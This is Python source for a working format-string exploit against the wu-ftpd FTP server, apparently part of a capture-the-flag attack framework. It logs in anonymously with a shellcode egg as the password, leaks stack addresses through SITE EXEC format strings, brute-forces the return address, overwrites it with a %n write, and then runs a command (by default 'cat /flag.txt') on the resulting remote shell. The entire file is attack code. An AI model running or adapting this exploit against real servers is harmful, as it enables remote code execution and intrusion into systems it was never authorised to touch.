def set_up(self): self.eggm = EggManager(shellcode,390) pass
class FTPFormatString(Exploit): MAX_ITERATION = 50 def __init__(self): Exploit.__init__(self,'Wuftpd format string', desc) self.add_param(StringParam('RESULT','well done','The string that must be present in the result if the attack is successful')) self.add_param(StringParam('CMD','cat /flag.txt', 'The command to be executed on the remote host')) self.eggm = None self.res = '' def set_up(self): self.eggm = EggManager(shellcode,390) pass def execute(self): #self.eggm = EggManager(shellcode,390) self.res = "" ftpm = ftp.FTPManager() if ftpm.connect()==False: raise ServiceDown() self.log.info("Sending login...") if (ftpm.send_cmd('user anonymous')==False): raise ExploitError('Connection error') self.log.debug('Banner: %s'%ftpm.welcome) resp = ftpm.get_ftp_response() self.log.debug('Received: %s'%resp) if ('331' in resp)==False: raise ExploitError('Unable to log-in') egg = self.eggm.get_egg() passwd = ftp.FTPCommand('pass',[egg]) ftpm.send_cmd(passwd) resp = ftpm.get_ftp_response() self.log.debug('Received: %s'%resp) if ('230' in resp)==False: raise ExploitError('Unable to log-in') self.log.info("Logged in (the egg is inside)") ftpm.send_cmd("SITE EXEC exec %x %x %x %x +%x |%x") reply = ftpm.get_ftp_response() self.log.debug('Received: %s'%reply) temp1 = string.index(reply,"|") temp2 = string.index(reply,"+") reta = long(reply[temp1+1:string.index(reply,"\n")],16) retz = long(reply[temp2+1:temp1],16) params = [] for i in range(89): params.append("%x") params.append("|%x") ftpm.send_cmd(ftp.FTPCommand("site exec",params)) reply = ftpm.get_ftp_response() retb = long(reply[string.index(reply,"|")+1 : string.index(reply,"\n")],16) add = 0 if reta == 0: reta = retz else: add = 600 reta = reta - 0x58 retb = retb +100 -0x2569 - add; self.log.debug(" reta = %x\r\n retz = %x\r\n retb = %x"%(reta,retz,retb)) self.log.info(" Finding return address....") counter = 22 st = 0 while(counter<22+self.MAX_ITERATION): params = ["kkkkkkkkkkkkkkkkkkkkkkkkkkbbbb%c%c\xff%c%c"%\ (reta & 0xff,\ (reta & 0xff00) >> 8,\ (reta & 0xff0000) >> 16,\ (reta & 0xff000000) >> 24)] for i in range(129): params.append("%f") for i in range(counter+1): params.append("%d") params.append("|%x|%x") ftpm.send_cmd("SITE EXEC "+string.join(params,"")) reply = ftpm.get_ftp_response() temp1 = string.index(reply,"|") temp2 = string.index(reply,"|",temp1+1) val = long(reply[temp1+1 : temp2],16) self.log.debug(" address = %x (I'm looking for %x)"%(val,reta)) if (val != 0): if (val == reta): st = 1 break counter = counter+1 if counter==22+self.MAX_ITERATION: self.log.warning("Attack failed. I cannot find the return address") return self.log.debug("Return address found after %d iterations"%(counter-22+1)) params = ["kkkkkkkkkkkkkkkkkkkkkkkkkkbbbb%c%c\xff%c%c"%\ (reta & 0xff,\ (reta & 0xff00) >> 8,\ (reta & 0xff0000) >> 16,\ (reta & 0xff000000) >> 24)] for i in range(129): params.append("%.f") for i in range(counter): params.append("%d") if(add == 600): params.append("|%%.%ud%%n"%(retb+9807)) else: params.append("|%%.%ud%%n"%(retb+9807-480)) ftpm.send_cmd("SITE EXEC "+string.join(params,"")) self.log.info("Waiting for a shell....") time.sleep(2) self.log.info("Sending command") ftpm.send_raw(self.CMD+"\n") temp = ftpm.sock.readline('\n',blocking=True) self.log.debug('Received: %s'%temp) self.res = ftpm.sock.readline('\n',blocking=True) self.log.debug("Result %r"%self.res) def isSuccessful(self): if self.RESULT in self.res: return exploit.RES_OK else: return exploit.RES_FAIL